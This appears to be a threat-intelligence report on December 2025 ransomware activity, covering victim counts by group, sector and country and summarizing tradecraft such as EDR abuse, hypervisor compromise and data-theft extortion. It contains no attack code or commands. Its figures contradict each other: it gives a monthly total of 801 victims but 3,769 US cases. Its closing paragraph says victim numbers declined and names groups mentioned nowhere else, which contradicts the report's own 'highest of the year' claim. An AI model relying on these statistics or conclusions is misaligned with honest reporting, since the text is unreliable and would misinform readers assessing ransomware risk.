Ransomware activity in December 2025 highlights an evolution toward cartel-style, collaborative ecosystems, where initial access, persistence, encryption, and extortion are increasingly decoupled and outsourced. December recorded the highest victim count of the year, with threat actors concentrating on high-leverage, data-dense industries where operational disruption and regulatory exposure maximize ransom pressure. Geographically, activity remained dominated by the United States, followed by Western Europe, while Asia-Pacific and Middle Eastern regions showed expanding exposure. From a tradecraft perspective, December activity emphasized abuse of trusted security tooling, hypervisor and virtualization-layer compromise for mass encryption, and data-theft-only extortion via centralized enterprise platforms, reducing reliance on custom malware. The ecosystem remains clearly bifurcated between mature operators and emerging groups such as Nova, which demonstrated consistent growth through data-centric extortion and public leak pressure.
Welcome to the Dec 2025 Ransomware Threat Report. This report delivers a detailed analysis of the ransomware landscape, highlighting the emergence of new ransomware groups, evolving attack techniques, and notable shifts in targeted industries. By examining key trends, tactics, and significant incidents, this report aims to support organizations and security teams in understanding the current threat environment. As ransomware campaigns continue to grow in complexity, this report serves as a vital resource for anticipating future threats and strengthening proactive cybersecurity strategies.
Throughout December 2025, there was notable activity from several ransomware groups. Here are the trends regarding the top 10:
The November–December 2025 comparison highlights significant shifts in ransomware activity, underscoring the volatility of the ecosystem. Qilin showed strong expansion, increasing from 105 to 175 victims, consolidating its position as a leading and fast-growing threat, while Safepay and Sinobi recorded sharp rises from 14 to 68 and 22 to 50 incidents, respectively, signaling increased operational momentum. Devman and Lynx also grew from smaller baselines, indicating emerging activity. In contrast, Cl0p experienced a dramatic collapse from 101 incidents in November to just 1 in December, suggesting a near-complete pause in operations, while Akira, Play, and Incransom saw moderate declines, pointing to reduced campaign intensity or strategic realignment. Overall, the data reflects a highly dynamic ransomware landscape, with rapid gains by select actors occurring alongside abrupt slowdowns among others.
In December 2025, ransomware activity remained heavily concentrated on operationally critical and data-intensive sectors. Professional Goods & Services emerged as the most targeted industry with 117 victims, followed by Manufacturing (98) and Real Estate and Construction (89), highlighting sustained adversary focus on sectors with high disruption and monetization potential. Consumer Goods and Services (87), Information Technology (69), Healthcare (64), and Materials (64) also experienced elevated victimization, reflecting continued pressure on industries central to supply chains and digital operations. Government and Civic entities recorded 52 incidents, underscoring persistent exposure of public-sector organizations, while Transportation and Logistics (30) and Education (26) faced moderate activity. Lower but notable targeting was observed across Automotive and Energy and Utilities (19 each), Finance (18), and Telecommunications and Media (16). Overall, December’s distribution indicates a deliberate emphasis on professional services, manufacturing, and infrastructure-linked sectors, reinforcing ransomware groups’ preference for victims with high operational impact and ransom leverage.
Ransomware activity intensified markedly in December 2025, culminating in the highest monthly victim count of the year at 801 incidents, confirming a strong year-end escalation. This represented a clear increase over November’s already elevated levels and capped a renewed upward trend observed in the final quarter of 2025. The December spike suggests coordinated campaign expansion, increased affiliate participation, and sustained focus on high-value sectors such as professional services, manufacturing, and information technology. Rather than an isolated anomaly, December’s surge reflects the ransomware ecosystem’s ability to rapidly re-accelerate following earlier tactical adjustments, reinforcing its persistence and adaptability as a dominant cyber threat entering 2026.
In December 2025, ransomware targeting remained overwhelmingly concentrated in the United States, which accounted for the vast majority of observed victims with 3,769 cases, reinforcing its role as the primary global hotspot for ransomware operations. Canada (387) and Germany (296) followed at a significant distance, alongside the United Kingdom (283), France (175), and Italy (166), reflecting sustained pressure on highly digitized Western economies.
Notably, a sizable volume of activity was attributed to unidentified or obfuscated locations (147), indicating deliberate victim geolocation masking by threat actors. Spain (143), Brazil (131), Australia (122), and India (109) further illustrate ransomware groups’ broad geographic reach, while continued activity across Asia-Pacific and the Middle East, including Japan, Singapore, South Korea, Taiwan, and the UAE, highlights expanding regional exposure.
Overall, December’s distribution underscores a highly globalized ransomware landscape, dominated by North America and Europe but increasingly characterized by widespread, opportunistic targeting across both mature and emerging markets.
Subversion of Endpoint Trust Mechanisms to Facilitate Ransomware Intrusions
Ransomware enablement increasingly depends on initial access brokers (IABs) who specialize in stealthy foothold creation rather than direct payload deployment. The threat actor Storm-0249, operating as a ransomware-focused IAB, exemplifies this progression by weaponizing trusted endpoint security tooling to execute malware under the guise of legitimate defense activity. By abusing signed EDR components, native Windows utilities, and in-memory execution, Storm-0249 shifts ransomware preparation into a low-noise, high-trust execution context that defeats signature-based and process-trust controls. This reflects an evolution where ransomware ecosystems outsource intrusion complexity to brokers capable of delivering pre-profiled, resilient access tailored to downstream ransomware affiliates.
ETLM Assessment:
This tradecraft signals continued expansion of EDR and security-tool abuse as a preferred access method, particularly as phishing efficacy declines and detection controls mature. Future activity is likely to emphasize deeper blending of malicious logic into trusted processes, broader cross-EDR applicability, and tighter alignment with ransomware operators’ requirements, such as victim fingerprinting and key-binding preparation. As ransomware groups increasingly rely on IABs like Storm-0249, the separation between access, staging, and encryption is expected to harden, making early-stage detection substantially more challenging.
Early-Stage Ransomware Commercialization
Ransomware activity increasingly reflects non-traditional entrants attempting to operationalize extortion tooling without mature cryptographic discipline, exposing structural weaknesses during early deployment. The threat actor group CyberVolk illustrates this dynamic through its debut of VolkLocker, where ideological motivation and rapid commercialization outpaced secure implementation. While adopting a ransomware-as-a-service model, multi-platform targeting, and destructive fail-safe logic, the use of a hardcoded master encryption key materially undermined confidentiality guarantees and eroded coercive leverage. This highlights a bifurcation within the ransomware ecosystem: mature operators refining reliability and negotiation power, contrasted with emergent groups prioritizing visibility and speed at the cost of technical rigor.
ETLM Assessment:
Such ransomware initiatives are likely to undergo rapid iteration as operators correct foundational flaws and attempt to legitimize their offerings within criminal marketplaces. Future development is expected to focus on remediating cryptographic weaknesses, stabilizing builders, and expanding auxiliary tooling (e.g., RATs and keyloggers) to broaden monetization beyond encryption alone. Given the group’s ideological alignment, ransomware is likely to remain a secondary instrument—used selectively to fund operations or amplify disruption—rather than evolve into a fully optimized profit-maximization platform comparable to established RaaS leaders.
Virtualization-Layer Control
Ransomware activity is increasingly anchored in virtualization control-plane compromise, where hypervisors function as aggregation points for mass encryption. By operating above the guest OS layer, threat actor groups bypass endpoint protections and apply ransomware effects across multiple virtual machines simultaneously using native management tooling. The threat actor group Akira demonstrates this evolution by favoring hypervisor access to disable security controls, manipulate VM states, and execute ransomware with minimal on-host artifacts. This represents a shift from payload-heavy deployment to access-driven ransomware execution, where administrative control replaces malware complexity.
ETLM Assessment:
Ransomware operators are likely to continue prioritizing credential theft, management-plane access, and segmentation failures over exploit-heavy intrusion paths. Future campaigns are expected to further reduce dependence on custom binaries, instead abusing built-in hypervisor utilities to stage and trigger encryption at scale. As endpoint defenses mature, ransomware strategy is positioned to concentrate on infrastructure layers where a single compromise yields systemic impact, reinforcing hypervisors as high-value targets for large-scale extortion.
Infrastructure Control Abuse
Ransomware operations are increasingly orienting towards infrastructure-level control points, with hypervisors emerging as high-leverage targets that collapse traditional host-based security assumptions. By shifting focus from individual endpoints to the virtualization layer, threat actor groups can achieve immediate, multiplicative impact across entire environments. The threat actor group Akira exemplifies this progression, favoring hypervisor access to bypass EDR visibility, disable defensive controls at scale, and directly manipulate virtual machine states. Abuse of native management utilities, credential pivoting to management planes, and encryption executed at the storage or volume level signal a move away from malware-centric execution toward operator-driven, tool-native ransomware deployment, optimized for speed and maximum disruption.
ETLM Assessment:
This trajectory points toward sustained exploitation of control-plane blind spots where monitoring, authentication hygiene, and segmentation are weakest. Future ransomware activity is likely to further emphasize credential abuse over exploit development, increase use of built-in hypervisor tooling to avoid custom payload delivery, and tighten coupling between hypervisor compromise and mass encryption workflows. As endpoint defenses continue to mature, ransomware operators are expected to deepen investment in infrastructure dominance strategies, prioritizing environments where a single administrative failure enables simultaneous compromise of dozens or hundreds of systems.
Rapid Exploit-to-Encryption Workflows
Recent exploitation patterns underscore a shift toward speed-centric ransomware deployment driven by newly disclosed application-layer vulnerabilities, rather than extended intrusion campaigns. The threat actor group Weaxor leveraged React2Shell to achieve unauthenticated remote code execution and transitioned to encryption within minutes, demonstrating a tightly coupled access-to-payload workflow. Immediate execution of obfuscated PowerShell, rapid establishment of command-and-control, defensive impairment, and host-level encryption indicate an emphasis on automation and time-to-impact over stealth or persistence. The absence of lateral movement and data exfiltration aligns with Weaxor’s lineage as a rebranded continuation of lower-complexity operations, prioritizing fast monetization through exposed services rather than full-spectrum enterprise compromise.
ETLM Assessment:
This pattern suggests continued exploitation of high-impact, internet-facing application vulnerabilities immediately following disclosure, with ransomware operators competing for access before remediation occurs. Future iterations are likely to further compress the intrusion timeline through prebuilt exploit chains, automated payload staging, and minimal on-host interaction to reduce detection windows. As defenders improve patch velocity, such operators may increasingly rely on short-lived access opportunities, accepting limited blast radius in exchange for repeatable, low-effort compromise across large numbers of vulnerable endpoints.
Abuse of Enterprise File-Sharing Infrastructure
Modern ransomware operations are increasingly optimized around systemic access to shared enterprise platforms rather than host-level compromise, as reflected in the operating pattern of the threat actor group Cl0p. Repeated targeting of internet-facing file transfer and file-sharing solutions demonstrates a strategic preference for technologies that aggregate high-value data across multiple business units and users. By exploiting exposed services, Cl0p minimizes lateral movement requirements while maximizing immediate access to sensitive repositories, enabling rapid data exfiltration without reliance on widespread encryption. This marks a sustained evolution away from disruptive ransomware toward pure data-theft extortion models designed for efficiency, scale, and repeatability across similar enterprise products.
ETLM Assessment:
This pattern indicates continued focus on identifying widely deployed, externally accessible enterprise data platforms with centralized trust models and inconsistent patch hygiene. Future activity is likely to involve accelerated scanning for newly disclosed or silently patched flaws, short exploitation windows ahead of mass remediation, and rapid monetization through public leak releases rather than prolonged negotiations. Given Cl0p’s historical consistency, further campaigns are expected to follow the same playbook across adjacent products, prioritizing vendors with large global customer bases and shared architectural weaknesses over bespoke victim selection.
Encryption-Centric Enhancements
Ransomware development is increasingly characterized by payload-level engineering sophistication rather than volume-driven deployment, as demonstrated by the threat actor group RansomHouse. The transition from linear, single-pass encryption to a multi-layered data transformation model reflects a deliberate focus on resilience, reliability, and analytical resistance. The introduction of dual-key encryption, dynamic chunk-based file processing, and non-linear execution paths materially increases encryption entropy while complicating static analysis and partial recovery. Enhancements in memory management and buffer segregation further indicate an emphasis on operational stability in large-scale enterprise environments, particularly virtualized infrastructure, reinforcing ransomware’s role as a precision extortion mechanism rather than a blunt disruption tool.
ETLM Assessment:
This trajectory suggests continued investment in encryptor modularity, adaptive execution logic, and environment-aware payload behavior to sustain leverage during negotiations. Future developments are likely to prioritize evasion of reverse engineering, faster execution against large data stores, and deeper alignment with virtualized and cloud-heavy enterprise architectures. Rather than pursuing mass campaigns, such operators are expected to refine tooling that maximizes coercive impact per victim, potentially integrating automated orchestration across hypervisors and selectively combining encryption with data-theft-driven pressure models to preserve relevance under defensive advances.
Precision-Driven Extortion
Ransomware operations increasingly operate as managed extortion enterprises, where individual threat actors function as affiliates executing intrusions under centralized governance. In the Nefilim model, access to ransomware tooling is conditional on revenue sharing, adherence to targeting thresholds, and use of administrator-controlled infrastructure. Victim-specific payloads, individualized decryption keys, and coordinated leak-site pressure reflect a shift from opportunistic encryption toward precision extortion optimized for high-revenue organizations. The role of the threat actor Artem Aleksandrovych Stryzhak demonstrates how affiliate execution enables scale while isolating core operators from direct exposure.
ETLM Assessment:
Continuation of this model favors deeper compartmentalization between access acquisition, payload deployment, negotiation, and data-leak operations. Future iterations are likely to emphasize selective targeting based on financial size, regulatory sensitivity, and data leverage, alongside rapid rebranding to counter law-enforcement disruption. Persistent leadership linkage across multiple ransomware families, including the threat actor Volodymyr Tymoshchuk, indicates an intent to preserve operational continuity through migration rather than dissolution.
Nova is an emerging ransomware group that showed clear signs of accelerating activity toward the end of 2025. The group recorded 15 victims in December 2025, up from 11 in November and 10 in October, indicating a consistent upward trajectory in operational tempo. This steady month-over-month increase suggests growing affiliate participation and improved campaign execution. Nova continues to employ a data-centric extortion model, leveraging public leak disclosures and countdown-based pressure to coerce victims across multiple sectors. The December uptick reinforces Nova’s evolution from a low-volume actor into a developing ransomware operation with expanding reach and the potential to become a more prominent threat as it enters 2026.
Collaborative Extortion Frameworks
Ransomware activity is increasingly shaped by collaborative operating models in which distinct threat actors specialize in discrete phases of the attack chain. The threat actor group DragonForce exemplifies this progression by repositioning itself from a standalone ransomware-as-a-service operation into a cartel-style platform that prioritizes affiliate scale, tooling reuse, and profit-driven recruitment over bespoke malware innovation. Technical refinement—such as hardened encryption routines, abuse of vulnerable kernel drivers to disable defenses, and cross-platform payload support—demonstrates incremental maturation, while strategic reliance on partners reflects a shift toward ecosystem-based ransomware execution. The operational linkage with the threat actor group Scattered Spider illustrates how ransomware effectiveness is amplified when intrusion, persistence, and social engineering are externalized to highly capable access specialists.
ETLM Assessment:
This model signals continued movement toward modular ransomware ecosystems, where cartel operators act as infrastructure and monetization providers while trusted partners deliver initial access and reconnaissance. Future campaigns are likely to deepen cooperative arrangements, accelerate affiliate onboarding through simplified builders, and expand reliance on human-centric intrusion vectors that bypass technical controls. As defensive tooling improves against single-actor threats, ransomware groups are expected to further institutionalize partnerships that blend social engineering dominance with resilient, multi-environment encryption frameworks.
Based on available public reports, approximately 31% of enterprises are compelled to halt their operations, either temporarily or permanently, in the aftermath of a ransomware onslaught. The ripple effects extend beyond operational disruptions, as detailed by additional metrics:
Impact Assessment
Ransomware remains a major threat to both organizations and individuals, locking critical data and demanding payment for its release. The consequences extend well beyond the ransom, often leading to costly recovery efforts, extended downtime, reputational harm, and potential regulatory fines. Such disruptions can destabilize operations and erode stakeholder trust. Addressing this growing risk demands a proactive cybersecurity posture and stronger collaboration between public and private sectors to build resilience against future attacks.
Victimology
Cybercriminals are increasingly targeting industries that manage vast amounts of sensitive data, ranging from personal and financial information to proprietary assets. Sectors such as manufacturing, real estate, healthcare, FMCG, e-commerce, finance, and technology remain high on the threat radar due to their complex and extensive digital infrastructures. Adversaries strategically exploit vulnerabilities in economically advanced regions, launching well-planned attacks designed to encrypt critical systems and extract significant ransom payments. These operations are calculated to yield maximum financial returns.
The ransomware threat landscape in December 2025 revealed a shift toward modular, evasive, and high-impact operations. While overall victim numbers declined slightly, key groups like Qilin demonstrated technical maturity by exploiting zero-day vulnerabilities and introducing legal pressure tactics. Emerging groups such as Fog and Anubis showcased complex tool chains, indicating a strategic pivot to stealth and long-term compromise. Established actors also began leveraging legitimate tools and cloud platforms for persistence and data exfiltration. Organizations must enhance resilience, as ransomware now operates as a service ecosystem, rapidly adapting to security counter measures.
